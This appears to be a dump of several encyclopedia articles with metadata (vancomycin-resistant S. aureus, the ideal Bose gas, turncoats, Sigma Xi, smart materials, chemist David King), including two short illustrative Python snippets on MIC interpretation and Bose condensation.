It is also termed GISA (glycopeptide-intermediate Staphylococcus aureus), indicating resistance to all glycopeptide antibiotics. These bacterial strains present a thickening of the cell wall, which is believed to reduce the ability of vancomycin to diffuse into the division septum of the cell, as required for effective vancomycin treatment. Vancomycin-resistant S. aureus (VRSA) High-level vancomycin resistance in S. aureus has rarely been reported. In vitro and in vivo experiments reported in 1992 demonstrated that vancomycin resistance genes from Enterococcus faecalis could be transferred to S. aureus, conferring high-level vancomycin resistance. Until 2002, no such genetic transfer had been reported in wild S. aureus strains. In 2002, a VRSA strain was isolated from a patient in Michigan. The isolate contained the mecA gene for methicillin resistance. Vancomycin MICs of the VRSA isolate were consistent with the VanA phenotype of Enterococcus species, and the presence of the vanA gene was confirmed by polymerase chain reaction. The DNA sequence of the VRSA vanA gene was identical to that of a vancomycin-resistant strain of Enterococcus faecalis recovered from the same catheter tip. The vanA gene was later found to be encoded within a transposon located on a plasmid carried by the VRSA isolate. This transposon, Tn1546, confers vanA-type vancomycin resistance in enterococci. As of 2019, 52 VRSA strains have been identified in the United States, India, Iran, Pakistan, Brazil, and Portugal. Heterogeneous vancomycin-intermediate S. aureus (hVISA) The definition of hVISA according to Hiramatsu et al. is a strain of Staphylococcus aureus that gives rise to vancomycin-resistant colonies at a frequency of 10⁻⁶ or higher. See also Drug resistance References Further reading External links PubMed Staphylococcaceae Bacterial diseases Antibiotic-resistant bacteria Staphylococcus
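The breakpoint comparison used in VRSA diagnosis is mechanical enough to sketch in code. The fragment below is a minimal illustration of the logic only, not a clinical tool: the function name and the numeric cut-offs are placeholders standing in for whichever values CLSI, BSAC, or EUCAST currently publish, and real interpretation also depends on the test method used.

```python
# Minimal sketch of breakpoint-based interpretation of a vancomycin MIC.
# The breakpoint values below are illustrative placeholders, not current
# CLSI/EUCAST values -- always consult the published standards.

def interpret_mic(mic_ug_per_ml: float,
                  susceptible_max: float = 2.0,
                  resistant_min: float = 16.0) -> str:
    """Classify an isolate as S (susceptible), I (intermediate),
    or R (resistant) by comparing its MIC against breakpoints."""
    if mic_ug_per_ml <= susceptible_max:
        return "S"
    if mic_ug_per_ml >= resistant_min:
        return "R"
    return "I"  # VISA-like isolates fall in this intermediate window

for mic in (1.0, 4.0, 32.0):
    print(f"MIC {mic} ug/mL -> {interpret_mic(mic)}")
```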
Vancomycin-resistant Staphylococcus aureus
[ "Biology" ]
1,293
[ "Bacteria", "Antibiotic-resistant bacteria" ]
1,064,839
https://en.wikipedia.org/wiki/Bose%20gas
An ideal Bose gas is a quantum-mechanical phase of matter, analogous to a classical ideal gas. It is composed of bosons, which have an integer value of spin and abide by Bose–Einstein statistics. The statistical mechanics of bosons were developed by Satyendra Nath Bose for a photon gas and extended to massive particles by Albert Einstein, who realized that an ideal gas of bosons would form a condensate at a low enough temperature, unlike a classical ideal gas. This condensate is known as a Bose–Einstein condensate. Introduction and examples Bosons are quantum mechanical particles that follow Bose–Einstein statistics, or equivalently, that possess integer spin. These particles can be classified as elementary, such as the Higgs boson, the photon, the gluon, the W/Z bosons and the hypothetical graviton; or composite, such as the hydrogen atom, the ¹⁶O atom, the deuterium nucleus, and mesons. Additionally, some quasiparticles in more complex systems, such as plasmons (quanta of charge-density waves), can also be considered bosons. The first model that treated a gas of several bosons was the photon gas, a gas of photons, developed by Bose. This model leads to a better understanding of Planck's law and black-body radiation. The photon gas can easily be extended to any kind of ensemble of massless non-interacting bosons. The phonon gas, also known as the Debye model, is an example in which the normal modes of vibration of the crystal lattice of a metal can be treated as effective massless bosons. Peter Debye used the phonon gas model to explain the behaviour of the heat capacity of metals at low temperature. An interesting example of a Bose gas is an ensemble of helium-4 atoms. When a system of ⁴He atoms is cooled down to temperatures near absolute zero, many quantum mechanical effects are present. Below 2.17 K, the ensemble starts to behave as a superfluid, a fluid with almost zero viscosity. The Bose gas is the simplest quantitative model that explains this phase transition. In particular, when a gas of bosons is cooled down, it forms a Bose–Einstein condensate, a state in which a large number of bosons occupy the lowest energy, the ground state, and quantum effects such as wave interference are macroscopically visible. The theory of Bose–Einstein condensates and Bose gases can also explain some features of superconductivity, where charge carriers couple in pairs (Cooper pairs) and behave like bosons. As a result, superconductors behave as if they had no electrical resistivity at low temperatures. The equivalent model for half-integer-spin particles (like electrons or helium-3 atoms), which follow Fermi–Dirac statistics, is called the Fermi gas (an ensemble of non-interacting fermions). At low enough particle number density and high temperature, both the Fermi gas and the Bose gas behave like a classical ideal gas. Macroscopic limit The thermodynamics of an ideal Bose gas is best calculated using the grand canonical ensemble. The grand potential for a Bose gas is given by $\Omega = \frac{1}{\beta}\sum_i g_i \ln\left(1 - z e^{-\beta\varepsilon_i}\right)$, where each term in the sum corresponds to a particular single-particle energy level εi; gi is the number of states with energy εi; z is the absolute activity (or "fugacity"), which may also be expressed in terms of the chemical potential μ by defining $z = e^{\beta\mu}$; and β is defined as $\beta = \frac{1}{k_B T}$, where kB is the Boltzmann constant and T is the temperature. All thermodynamic quantities may be derived from the grand potential, and we will consider all thermodynamic quantities to be functions of only the three variables z, β (or T), and V.
All partial derivatives are taken with respect to one of these three variables while the other two are held constant. The permissible range of z is from negative infinity to +1, as any value beyond this would give an infinite number of particles to states with an energy level of 0 (it is assumed that the energy levels have been offset so that the lowest energy level is 0). Macroscopic limit, result for uncondensed fraction Following the procedure described in the gas in a box article, we can apply the Thomas–Fermi approximation, which assumes that the average energy is large compared to the energy difference between levels so that the above sum may be replaced by an integral. This replacement gives the macroscopic grand potential function $\Omega_m$, which is close to $\Omega$: $\Omega_m = \frac{1}{\beta}\int_0^\infty \ln\left(1 - z e^{-\beta E}\right)\,dg$. The degeneracy dg may be expressed for many different situations by the general formula $dg = \frac{1}{\Gamma(\alpha)}\,\frac{E^{\alpha-1}}{E_c^{\alpha}}\,dE$, where α is a constant, Ec is a critical energy, and Γ is the gamma function. For example, for a massive Bose gas in a box, α = 3/2 and the critical energy is given by $E_c = \frac{1}{\beta}\left(\frac{\Lambda^3}{Vf}\right)^{2/3}$, where Λ is the thermal wavelength and f is a degeneracy factor (f = 1 for simple spinless bosons); since Λ³ scales as β^(3/2), the temperature dependence cancels and Ec is a function of volume only. For a massive Bose gas in a harmonic trap, α = 3 and the critical energy is given by $E_c = \hbar\omega$ (taking f = 1), where ω is the trap frequency and V(r) = mω²r²/2 is the harmonic potential. This integral expression for the grand potential evaluates to $\Omega_m = -\frac{\operatorname{Li}_{\alpha+1}(z)}{\left(\beta E_c\right)^{\alpha}\,\beta}$, where Li_s(x) is the polylogarithm function. The problem with this continuum approximation for a Bose gas is that the ground state has been effectively ignored, giving a degeneracy of zero for zero energy. This inaccuracy becomes serious when dealing with the Bose–Einstein condensate and will be dealt with in the next sections. As will be seen, even at low temperatures the above result is still useful for accurately describing the thermodynamics of just the uncondensed portion of the gas. Limit on number of particles in uncondensed phase, critical temperature The total number of particles is found from the grand potential by $N = -z\,\frac{\partial(\beta\Omega_m)}{\partial z} = \frac{\operatorname{Li}_{\alpha}(z)}{\left(\beta E_c\right)^{\alpha}}$. This increases monotonically with z (up to the maximum z = +1). The behaviour when approaching z = 1 is however crucially dependent on the value of α (i.e., dependent on whether the gas is 1D, 2D, 3D, whether it is in a flat or harmonic potential well). For α > 1, the number of particles only increases up to a finite maximum value, i.e., Nm is finite at z = 1: $N_m = \frac{\zeta(\alpha)}{\left(\beta E_c\right)^{\alpha}}$, where ζ(α) is the Riemann zeta function (using Li_α(1) = ζ(α)). Thus, for a fixed number of particles Nm, the largest possible value that β can have is a critical value βc. This corresponds to a critical temperature Tc = 1/(kBβc), below which the Thomas–Fermi approximation breaks down (the continuum of states simply can no longer support this many particles, at lower temperatures). The above equation can be solved for the critical temperature: $T_c = \frac{E_c}{k_B}\left(\frac{N_m}{\zeta(\alpha)}\right)^{1/\alpha}$. For example, for the three-dimensional Bose gas in a box (α = 3/2 and using the above noted value of Ec) we get $T_c = \left(\frac{N_m}{V f\,\zeta(3/2)}\right)^{2/3}\frac{h^2}{2\pi m k_B}$. For α ≤ 1, there is no upper limit on the number of particles (Nm diverges as z approaches 1), and thus for example for a gas in a one- or two-dimensional box (α = 1/2 and α = 1, respectively) there is no critical temperature. Inclusion of the ground state The above problem raises the question for α > 1: if a Bose gas with a fixed number of particles is lowered down below the critical temperature, what happens? The problem here is that the Thomas–Fermi approximation has set the degeneracy of the ground state to zero, which is wrong. There is no ground state to accept the condensate and so particles simply 'disappear' from the continuum of states.
It turns out, however, that the macroscopic equation gives an accurate estimate of the number of particles in the excited states, and it is not a bad approximation to simply "tack on" a ground state term to accept the particles that fall out of the continuum: $N = N_0 + \frac{\operatorname{Li}_{\alpha}(z)}{\left(\beta E_c\right)^{\alpha}}$, where N0 is the number of particles in the ground state condensate. Thus in the macroscopic limit, when T < Tc, the value of z is pinned to 1 and N0 takes up the remainder of particles. For T > Tc there is the normal behaviour, with N0 = 0. This approach gives the fraction of condensed particles in the macroscopic limit: $\frac{N_0}{N} = 1 - \left(\frac{T}{T_c}\right)^{\alpha}$ for T < Tc, and zero above Tc. Limitations of the macroscopic Bose gas model The above standard treatment of a macroscopic Bose gas is straightforward, but the inclusion of the ground state is somewhat inelegant. Another approach is to include the ground state explicitly (contributing a term in the grand potential, as in the section below); this gives rise to an unrealistic fluctuation catastrophe: the number of particles in any given state follows a geometric distribution, meaning that when condensation happens below Tc and most particles are in one state, there is a huge uncertainty in the total number of particles. This is related to the fact that the compressibility becomes unbounded for T < Tc. Calculations can instead be performed in the canonical ensemble, which fixes the total particle number; however, the calculations are not as easy. Practically however, the aforementioned theoretical flaw is a minor issue, as the most unrealistic assumption is that of non-interaction between bosons. Experimental realizations of boson gases always have significant interactions, i.e., they are non-ideal gases. The interactions significantly change the physics of how a condensate of bosons behaves: the ground state spreads out, the chemical potential saturates to a positive value even at zero temperature, and the fluctuation problem disappears (the compressibility becomes finite). See the article Bose–Einstein condensate. Approximate behaviour in small gases For smaller, mesoscopic, systems (for example, with only thousands of particles), the ground state term can be more explicitly approximated by adding in an actual discrete level at energy ε = 0 in the grand potential, $\Omega = g_0\,\frac{\ln(1-z)}{\beta} + \Omega_m$, which gives instead $N = \frac{g_0\,z}{1-z} + \frac{\operatorname{Li}_{\alpha}(z)}{\left(\beta E_c\right)^{\alpha}}$. Now, the behaviour is smooth when crossing the critical temperature, and z approaches 1 very closely but does not reach it. This can now be solved down to absolute zero in temperature. Figure 1 shows the results of the solution to this equation for α = 3/2, which corresponds to a gas of bosons in a box. The black lines are the fraction of excited states, the blue lines are the fraction of condensed particles N0/N, the red lines plot the negative of the chemical potential μ, and the green lines plot the corresponding values of z. The horizontal axis is the normalized temperature τ defined by τ = T/Tc. It can be seen that each of these parameters becomes linear in τ^α in the limit of low temperature and, except for the chemical potential, linear in 1/τ^α in the limit of high temperature. As the number of particles increases, the condensed and excited fractions tend towards a discontinuity at the critical temperature. The equation for the number of particles can be written in terms of the normalized temperature as $N = \frac{g_0\,z}{1-z} + N\,\frac{\operatorname{Li}_{\alpha}(z)}{\zeta(\alpha)}\,\tau^{\alpha}$. For a given N and τ, this equation can be solved for τ^α, and then a series solution for z can be found by the method of inversion of series, either in powers of τ^α or as an asymptotic expansion in inverse powers of τ^α.
From these expansions, we can find the behavior of the gas near the critical temperature and in the Maxwell–Boltzmann limit as T approaches infinity. In particular, we are interested in the limit as N approaches infinity, which can be easily determined from these expansions. This approach to modelling small systems may in fact be unrealistic, however, since the variance in the number of particles in the ground state is very large, equal to the number of particles. In contrast, the variance of particle number in a normal gas is only the square root of the particle number, which is why it can normally be ignored. This high variance is due to the choice of using the grand canonical ensemble for the entire system, including the condensate state. Thermodynamics Expanded out, the grand potential is $\Omega = g_0\,\frac{\ln(1-z)}{\beta} - \frac{\operatorname{Li}_{\alpha+1}(z)}{\left(\beta E_c\right)^{\alpha}\,\beta}$. All thermodynamic properties can be computed from this potential. The following table lists various thermodynamic quantities calculated in the limit of low temperature and high temperature, and in the limit of infinite particle number. An equal sign (=) indicates an exact result, while an approximation symbol indicates that only the first few terms of a series expansion are shown. It is seen that all quantities approach the values for a classical ideal gas in the limit of large temperature. The above values can be used to calculate other thermodynamic quantities. For example, the relationship between internal energy and the product of pressure and volume is the same as that for a classical ideal gas over all temperatures: $U = \alpha P V$. A similar situation holds for the specific heat at constant volume. The entropy is given by $T S = U + P V - \mu N$. Note that in the limit of high temperature, we have $\frac{S}{N k_B} \approx (\alpha + 1) - \ln\left(N \left(\beta E_c\right)^{\alpha}\right)$, which, for α = 3/2, is simply a restatement of the Sackur–Tetrode equation. In one dimension, bosons with a delta-function interaction behave as fermions: they obey the Pauli exclusion principle. In one dimension, the Bose gas with delta-function interaction can be solved exactly by the Bethe ansatz. The bulk free energy and thermodynamic potentials were calculated by Chen-Ning Yang. In the one-dimensional case, correlation functions have also been evaluated. In one dimension, the Bose gas is equivalent to the quantum non-linear Schrödinger equation. See also Tonks–Girardeau gas References General references Bose–Einstein statistics Ideal gas Quantum mechanics Thermodynamics Satyendra Nath Bose
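Because the macroscopic-limit results above are closed-form, the condensed fraction is straightforward to evaluate numerically. The sketch below assumes the standard three-dimensional box case (α = 3/2) and the critical-temperature formula quoted above with f = 1; the particle mass and number density are assumed illustrative values, not figures from the article.

```python
# Condensed fraction of an ideal Bose gas in a 3D box (alpha = 3/2),
# using N0/N = 1 - (T/Tc)^alpha below Tc and 0 above it.
# The mass and number density are assumed illustrative values only.
import math
from scipy.special import zeta  # Riemann zeta; zeta(1.5) ~ 2.612

HBAR = 1.054571817e-34  # reduced Planck constant, J s
KB = 1.380649e-23       # Boltzmann constant, J/K

def critical_temperature(n: float, m: float) -> float:
    """Tc = (2*pi*hbar^2 / (m*kB)) * (n / zeta(3/2))^(2/3), for f = 1."""
    return (2 * math.pi * HBAR**2 / (m * KB)) * (n / zeta(1.5)) ** (2 / 3)

def condensed_fraction(T: float, Tc: float, alpha: float = 1.5) -> float:
    return max(0.0, 1.0 - (T / Tc) ** alpha)

m = 87 * 1.66053906660e-27  # roughly the mass of a rubidium-87 atom, kg
n = 1e20                    # assumed number density, m^-3
Tc = critical_temperature(n, m)
for T in (0.25 * Tc, 0.5 * Tc, Tc, 2.0 * Tc):
    print(f"T/Tc = {T/Tc:4.2f}: N0/N = {condensed_fraction(T, Tc):.3f}")
```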
Bose gas
[ "Physics", "Chemistry", "Mathematics" ]
2,742
[ "Thermodynamic systems", "Theoretical physics", "Quantum mechanics", "Physical systems", "Thermodynamics", "Ideal gas", "Dynamical systems" ]
1,064,845
https://en.wikipedia.org/wiki/Turncoat
A turncoat, also known as a turncloak, is a person who shifts allegiance from one loyalty or ideal to another, betraying or deserting an original cause by switching to the opposing side or party. In political and social history, this is distinct from being a traitor, as the switch mostly takes place under the following circumstances: In groups, often driven by one or more leaders. When the goal that formerly motivated and benefited the person becomes (or is perceived as having become) either no longer feasible or too costly even if success is achieved. From a military perspective, opposing armies generally wear uniforms of contrasting colors to prevent incidents of friendly fire. Thus the term "turn-coat" indicates that an individual has changed sides and turned his uniform coat to one matching the color of his former enemy. For example, in the English Civil War during the 17th century, Oliver Cromwell's soldiers turned their coats inside out to match the colors of the Royal army (see Examples below). Historical context Even in a modern historical context, "turncoat" is often synonymous with the term "renegade", a term of religious origin derived from the Latin word "renegare" (to deny). Historical currents of great magnitude have periodically caught masses of people, along with their leaders, in their wake. In such a dire situation, new perspectives on past actions are laid bare and the question of personal treason becomes muddled. One example would be the situation that led to the Act of Abjuration or Plakkaat van Verlatinghe, signed on July 26, 1581, in the Netherlands, an instance where changing sides was given a positive meaning. The first written use of the term, in the sense of "one who changes his principles or party; a renegade; an apostate", was by J. Foxe in Actes & Monuments in 1570. "Turncoat" could also have a more literal origin. According to the Rotuli Chartarum 1199–1216, two barons changed fealty from William Marshal, 1st Earl of Pembroke, to King John. In other words, they turned their coats (of arms) from one lord to another, hence turncoat. Process A mass shift in allegiance by a population may take place during military occupation, after a nation has been defeated in war or after a major social upheaval, such as a revolution. Following the initial traumatic times, many of the citizens of the area in question quickly embrace the cause of the victors to benefit from the new system. This shift of allegiance is often done without much knowledge about the new order that is replacing the former one. In the face of fear and insecurity, the prime motive for a turncoat to draw away from former allegiances may be mere survival. Often the leaders are the first to change loyalties, for they have had access to privileged information and are more aware of the hopelessness of the situation for their former cause. This is especially apparent in dictatorships and authoritarian states, where most of the population has been fed propaganda and triumphalism and has been kept in the dark about important turns of events. Aftermath As time goes by, along with the embracing of life under the new circumstances comes a need to bury and rewrite the past by concealing evidence. The fear of the past coming to upset the newly found stability is always present in the mind of the turncoat. The past is rewritten and whitewashed to cover former deeds. When successful, this activity results in the distortion and falsification of historical events.
Even after the death of a turncoat, his family and friends may wish to keep uncomfortable secrets from the past out of the light. There is a fear of loss of prestige, as well as a wish to honor the memory of a family member, on the part of those who have experienced the positive side of the person. In certain countries, individuals and organizations have actively investigated the past to bring turncoats to justice to face their responsibilities. Examples There have been many turncoats throughout history, including: The English Civil War during the 17th century. The siege of Corfe Castle was won by Oliver Cromwell's soldiers when they turned their coats inside out to match the colors of the Royal army. During the revolution of the British American colonies, when U.S. Continental Army Major General Benedict Arnold defected to the side of the British in May 1779. Canada during the War of 1812. Some Canadians felt republicanism was a better system of government than the constitutional British monarchy and fought on the side of the invading Americans. Germany and Austria after World War II, when many former enthusiastic members of the Nazi Party embraced the newly created nations of West Germany or East Germany and sought to erase or at least minimize their former role as Nazis. During the decades that followed, many former Nazis regained prestige and held high posts in the new republics. Kurt Waldheim, an Austrian Nazi, even held the highest post as Secretary-General of the United Nations from 1972 to 1981 and as President of Austria from 1986 to 1992. France after the downfall of the Vichy Regime, when many collaborationists, whether home-grown fascists or Nazi sympathizers, played down their role in the former government and its institutions. Russia and the former Communist Eastern European countries after the fall of the USSR, where many former communists suddenly became fervent supporters of capitalism. As a result, many former apparatchiks abandoned the Communist Party in favor of positions in the new government structures. In Spain after the Spanish Civil War (1936–1939), and again during the Spanish transition to democracy (1975 onwards). In Syria, right after the fall of the Assad regime on 8 December 2024, many of Assad's supporters (the Shabiha) turned against him and began voicing support for the revolution. Just days before his escape, they were calling for bombs to be dropped on rebel-controlled areas. See also Abjuration Benedict Arnold, a general who originally fought for the American Continental Army but defected to the British Army Collaboration with the Axis Powers during World War II Cover-up Craig Counsell Defection Dual loyalty in politics Flip-flop (politics) Historical revisionism (negationism), falsification of history History of the Soviet Union (1982–1991) Dissolution of the Soviet Union Jacques Dutronc, whose song L'opportuniste is about being a turncoat List of former Nazi Party members Nazi hunter Pursuit of Nazi collaborators Quisling Whitewash (censorship) References Human behavior Deception Political science Defectors by type
Turncoat
[ "Biology" ]
1,324
[ "Opportunism", "Behavior", "Human behavior" ]
1,064,914
https://en.wikipedia.org/wiki/Sigma%20Xi
Sigma Xi, The Scientific Research Honor Society, is a non-profit honor society for scientists and engineers. Sigma Xi was founded at Cornell University by a junior faculty member and a small group of graduate students in 1886 and is one of the oldest honor societies. Membership in Sigma Xi is by invitation only, where members nominate others on the basis of their research achievements or potential. Sigma Xi's goals are to honor excellence in scientific investigation and to encourage cooperation among researchers in all fields of science and engineering. Many of the world's most influential scientists have been members of Sigma Xi, such as Albert Einstein, Linus Pauling, Barbara McClintock, and Sally Ride. Overview Sigma Xi has nearly 60,000 members who were elected to membership based on their research achievements and potential. It has more than 500 chapters in North America and around the world. In addition to publishing American Scientist magazine, Sigma Xi provides grants annually to promising young researchers and sponsors a variety of programs supporting ethics in research, science and engineering education, the public understanding of science, international research cooperation and the overall health of the research enterprise. The Society is based in Research Triangle Park, North Carolina. Sigma Xi was one of six honor societies that co-founded the Association of College Honor Societies (ACHS). Its participation was short-lived, with the decision to withdraw and operate again as an independent society made just over a decade later. Today, Sigma Xi participates in a more loosely coordinated lobbying association of four of the nation's oldest and most prestigious honor societies, called the Honor Society Caucus. Its members include Phi Beta Kappa, Phi Kappa Phi, Sigma Xi, and Omicron Delta Kappa. History Sigma Xi originated in 1886 at Cornell University. Founded by engineering students and Cornell faculty member Frank Van Vleck, the society had the primary objective of acknowledging significant scientific research and fostering cooperation among scientists from various disciplines. By 1888, Sigma Xi included five female members and established chapters at educational institutions such as Rensselaer Polytechnic Institute, Union College, Stevens Institute of Technology, and Rutgers College. By the end of the 19th century, the society consisted of over 1,000 members in eight chapters. In the early 20th century, following the 1906 San Francisco earthquake, Sigma Xi's Stanford and Berkeley chapters were involved in reconstruction and public health initiatives. The society later introduced the publication American Scientist, which discusses scientific and technological developments. During World War I, the National Research Council collaborated with Sigma Xi to organize research facilities. The society expanded significantly after the war, and by the 1930s, it had chapters at prestigious institutions like Harvard, Caltech, MIT, and Princeton. Sigma Xi initiated the Distinguished Lectureships Program in the late 1930s, aimed at promoting its activities and research findings. By 1950, the society's membership numbered 42,000. In 1947, the Scientific Research Society of America (RESA) was created to support research in various settings. The two societies combined in 1974 under the name Sigma Xi, The Scientific Research Society. In 1989, Sigma Xi revised its mission statement, emphasizing the importance of science and its role in society. Currently, Sigma Xi has approximately 60,000 members in over 500 chapters worldwide.
The society remains committed to recognizing scientific achievements and promoting global collaboration in science and technology. Notable past presidents of Sigma Xi include Frederick Robbins, a Nobel Prize recipient, and Rita Colwell, the former National Science Foundation Director. Motto and name The Greek letters "Sigma" and "Xi" form the acronym of the Society's motto, or "Spoudon Xynones," which translates as "Companions in Zealous Research." The word 'Honor' was added to the name of the Society at the 2016 Annual Meeting. According to Sigma Xi President Tee L. Guidotti, "Sigma Xi, of course, is our basic name and has been since the organization was founded in 1886 as the scientific and engineering counterpart to Phi Beta Kappa. Like all "Greek letter" societies, whether professional or social, it is an acronym for the motto of the organization, (Spoudon Xynones), which translates as "companions in Zealous Research." For many years, we were referred to as "Society of the Sigma Xi." In the early twentieth century, some in the leadership wanted "Sigma Xi" to be dropped altogether in favor of some formulation such as "Scientific Research Society of America." In a strange quirk of history, both names survived because the organization split in the 1940s into an academic honor society (Sigma Xi) and an honor society for applied research and engineering (the Scientific Research Society of America, called RESA). RESA was a separate entity, wholly owned by Sigma Xi, and represented engineers and scientists at non-academic institutions, such as government and industrial research laboratories. In an even stranger development, Sigma Xi and RESA merged back together in 1974 and eventually began calling itself Sigma Xi, The Scientific Research Society." William Procter Prize The William Procter Prize for Scientific Achievement is an award presented by Sigma Xi. This prestigious prize is given to a scientist who has made an outstanding contribution to scientific research and has demonstrated an ability to communicate the significance of this research to scientists in other disciplines. The prize was established in 1950 in honor of William Procter, a distinguished business leader and philanthropist who had a strong commitment to scientific research and development. Procter was an heir to the Procter & Gamble Company and served as its president and chairman. Recipients of the William Procter Prize are recognized for their achievements in both research and communication, reflecting the dual emphasis of Sigma Xi on promoting both scientific excellence and interdisciplinary communication. Along with the recognition, the awardee also delivers a lecture at the society's annual meeting or another appropriate occasion. Over the years, the William Procter Prize has been awarded to many notable scientists from a wide range of disciplines, underscoring the prize's commitment to honoring and promoting interdisciplinary research. Chapters As of May 4, 2023, 350 chapters are active in the United States, 170 are inactive, and the society has chartered over 20 chapters in other countries. Notable members More than 200 winners of the Nobel Prize have been Sigma Xi members, including Albert Einstein, Enrico Fermi, Richard Feynman, Linus Pauling, Francis Crick, James Watson, Barbara McClintock, John Goodenough, and Jennifer Doudna. 
See also Alpha Chi Sigma, a professional fraternity specializing in the fields of the chemical sciences References External links Sigma Xi's Year of Water H2008 Blog Guide to the Sigma Xi, The Scientific Research Society Records 1928-2003 International scientific organizations Scientific societies based in the United States 1886 establishments in New York (state) Scientific organizations established in 1886 Former members of Association of College Honor Societies Student organizations established in 1886 Honor Society Caucus Engineering honor societies
Sigma Xi
[ "Engineering" ]
1,376
[ "Engineering societies", "Engineering honor societies" ]
1,065,009
https://en.wikipedia.org/wiki/Smart%20material
Smart materials, also called intelligent or responsive materials, are designed materials that have one or more properties that can be significantly changed in a controlled fashion by external stimuli, such as stress, moisture, electric or magnetic fields, light, temperature, pH, or chemical compounds. Smart materials are the basis of many applications, including sensors and actuators, or artificial muscles, particularly as electroactive polymers (EAPs). Types There are a number of types of smart material, some of which are already common. Some examples are as follows: Piezoelectric materials are materials that produce a voltage when stress is applied. Since this effect also applies in a reverse manner, a voltage across the sample will produce stress within the sample. Suitably designed structures made from these materials can, therefore, be made that bend, expand or contract when a voltage is applied (a rough numerical sketch of the direct effect follows this list). Shape-memory alloys and shape-memory polymers are materials in which large deformation can be induced and recovered through temperature changes or stress changes (pseudoelasticity). The shape-memory effect results from a martensitic phase change and from induced elasticity at higher temperatures, respectively. Photovoltaic materials or optoelectronics convert light to electrical current. Electroactive polymers (EAPs) change their volume in response to a voltage or electric field. Magnetostrictive materials exhibit a change in shape under the influence of a magnetic field and also exhibit a change in their magnetization under the influence of mechanical stress. Magnetic shape-memory alloys are materials that change their shape in response to a significant change in the magnetic field. Smart inorganic polymers show tunable and responsive properties. pH-sensitive polymers are materials that change in volume when the pH of the surrounding medium changes. Temperature-responsive polymers are materials which undergo changes in response to temperature. Halochromic materials are commonly used materials that change their color as a result of changing acidity. One suggested application is for paints that can change color to indicate corrosion in the metal underneath them. Chromogenic systems change color in response to electrical, optical or thermal changes. These include electrochromic materials, which change their colour or opacity on the application of a voltage (e.g., liquid crystal displays); thermochromic materials, which change in colour depending on their temperature; and photochromic materials, which change colour in response to light, for example light-sensitive sunglasses that darken when exposed to bright sunlight. Ferrofluids are magnetic fluids (affected by magnets and magnetic fields). Photomechanical materials change shape under exposure to light. Polycaprolactone (polymorph) can be molded by immersion in hot water. Self-healing materials have the intrinsic ability to repair damage due to normal usage, thus expanding the material's lifetime. Dielectric elastomers (DEs) are smart material systems which produce large strains (up to 500%) under the influence of an external electric field. Magnetocaloric materials are compounds that undergo a reversible change in temperature upon exposure to a changing magnetic field. Thermoelectric materials are used to build devices that convert temperature differences into electricity and vice versa. Chemoresponsive materials change size or volume under the influence of external chemical or biological compounds.
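As noted after the piezoelectric entry above, the direct piezoelectric effect admits a back-of-the-envelope estimate: the charge generated by a loaded disc, Q = d₃₃·F, and the open-circuit voltage across the disc's own capacitance, V = Q/C. All material and geometry numbers below are assumed, PZT-like illustrative values, not data from this article.

```python
# Rough numerical sketch of the direct piezoelectric effect for a disc
# loaded along its poling axis: Q = d33 * F, V = Q / C.
# All parameter values are assumed, PZT-like illustrative magnitudes.

EPS0 = 8.8541878128e-12  # vacuum permittivity, F/m

d33 = 400e-12     # piezoelectric charge coefficient, C/N (assumed)
eps_r = 1800      # relative permittivity (assumed)
area = 1e-4       # disc area: 1 cm^2, in m^2
thickness = 1e-3  # disc thickness: 1 mm, in m
force = 10.0      # applied compressive force, N

charge = d33 * force                           # generated charge, C
capacitance = eps_r * EPS0 * area / thickness  # parallel-plate estimate, F
voltage = charge / capacitance                 # open-circuit voltage, V

print(f"Q = {charge:.2e} C, C = {capacitance:.2e} F, V = {voltage:.2f} V")
```

With these numbers the disc develops a couple of volts under a modest 10 N load, which is one reason piezoelectric elements make convenient sensors.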
See also Smart polymer Programmable matter Sensors Actuators Artificial muscles Thermally induced shape-memory effect (polymers) Covalent adaptable networks / Vitrimers References External links Smart Materials Book Series, Royal Society of Chemistry Artificial materials
Smart material
[ "Physics", "Materials_science", "Engineering" ]
705
[ "Materials science", "Artificial materials", "Materials", "Smart materials", "Matter" ]
1,065,128
https://en.wikipedia.org/wiki/David%20King%20%28chemist%29
Sir David Anthony King (born 12 August 1939) is a South African-born British chemist, academic, and head of the Climate Crisis Advisory Group (CCAG). King first taught at Imperial College, London, the University of East Anglia, and was then Brunner Professor of Physical Chemistry (1974–1988) at the University of Liverpool. He held the 1920 Chair of Physical Chemistry at the University of Cambridge from 1988 to 2006, and was Master of Downing College, Cambridge, from 1995 to 2000: he is now emeritus professor. While at Cambridge, he was successively a fellow of St John's College, Downing College, and Queens' College. Moving to the University of Oxford, he was Director of the Smith School of Enterprise and the Environment from 2008 to 2012, and a Fellow of University College, Oxford, from 2009 to 2012. He was additionally President of Collegio Carlo Alberto in Turin, Italy (2008–2011), and Chancellor of the University of Liverpool (2010–2013). Outside of academia, King was Chief Scientific Adviser to the UK Government and Head of the Government Office for Science from 2000 to 2007. He was then senior scientific adviser to UBS, a Swiss investment bank and financial services company, from 2008 to 2013. From 2013 to 2017, he returned to working with the UK Government as Special Representative for Climate Change to the Foreign Secretary. He was also Chairman of the government's Future Cities Catapult from 2013 to 2016. Early life and education King was born on 12 August 1939 in South Africa, son of Arnold Tom Wallis King, of Johannesburg, director of a paint company, and Patricia Mary Bede, née Vardy. His elder brother, Michael Wallis King (born 1937), was director of the FirstRand bank and vice-chair of the multinational mining company Anglo American plc. King was educated at St John's College, an all-boys private school in Johannesburg. He studied at University of the Witwatersrand, graduating with a Bachelor of Science (BSc) degree and then a Doctor of Philosophy (PhD) degree in 1963. Academic career After his PhD, King moved to the United Kingdom where he was a Shell Scholar at Imperial College, London, from 1963 to 1966. He was then a lecturer in the School of Chemical Sciences of the University of East Anglia from 1966 to 1974. He was appointed Brunner Professor of Physical Chemistry at the University of Liverpool in 1974. He was a member of the National Executive of the Association of University Teachers from 1970 until 1978, and served as its president for the 1976/77 academic year. In 1988, King was appointed 1920 Professor of Physical Chemistry at the University of Cambridge. He subsequently served as Head of the University's Department of Chemistry from 1993 to 2000, and was its director of research from 2005 to 2011. When he first moved to Cambridge in 1988, he was elected a Fellow of St John's College, Cambridge. He moved from St John's when he was elected Master of Downing College, Cambridge, in 1995. He stepped down as Master in 2000, and was then a Fellow of Queens' College, Cambridge, from 2001 to 2008. From 2008 to 2012, King was Director of the Smith School of Enterprise and the Environment at the University of Oxford. He was also a Fellow of University College, Oxford, from 2009 to 2012. He was President of Collegio Carlo Alberto in Turin, Italy, from 2008 to 2011, and was Chancellor of the University of Liverpool from 2010 to 2013. Research King has published over 500 papers on his research in chemical physics and on science and policy. 
